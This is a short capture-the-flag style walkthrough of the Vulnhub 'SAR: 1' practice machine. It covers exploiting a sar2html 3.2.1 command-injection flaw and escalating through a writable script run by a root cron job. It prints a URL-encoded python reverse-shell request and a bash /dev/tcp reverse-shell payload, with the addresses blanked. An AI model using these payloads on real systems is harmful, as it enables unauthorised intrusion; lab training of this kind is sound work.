Vulnhub - SAR: 1
Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.
This box is on the NetSecFocus Admin list of OSCP-like machines. It’s SAR: 1 from vulnhub.
HTTP on port 80 only. This already makes things easy because you know that you’ll be getting a webshell and not (for example) hunting for SSH creds.
robots.txt has one entry: sar2HTML, so naturally we go straight there. It’s running sar2html Ver 3.2.1, which has an unauthenticated RCE vulnerability which I’ve seen before in the THM Boiler room, so I know what to do already.
In web application you will see index.php?plot url extension.
http:///index.php?plot=; will execute the command you entered. After command injection press "select # host" then your command's output will appear bottom side of the scroll screen.
My preferred method with this is using Burp Suite:
GET /sar2HTML/index.php?plot=;python3+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("",1234))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)["/bin/sh","-i"])%3b' HTTP/1.1
The box has been set up with a cron job to exploit for root. Every 5 minutes, root runs a script called (which we can’t edit), which in turn calls (which we can edit). I found this via basic manual enumeration and saw what I had to do almost immediately, but somehow still struggled to get it to execute.
I made several mistakes, including trying to connect to a closed port on my Kali machine (I’ve recently installed ufw and not opened the second port I like to use for a listener), and mixing bash with sh commands. Anyway my final payload for was:
root@kali:/opt/vulnhub/sar# cat
/bin/bash -i >& /dev/tcp/ 0>&1
And that worked fine and I was root and all was right with the world.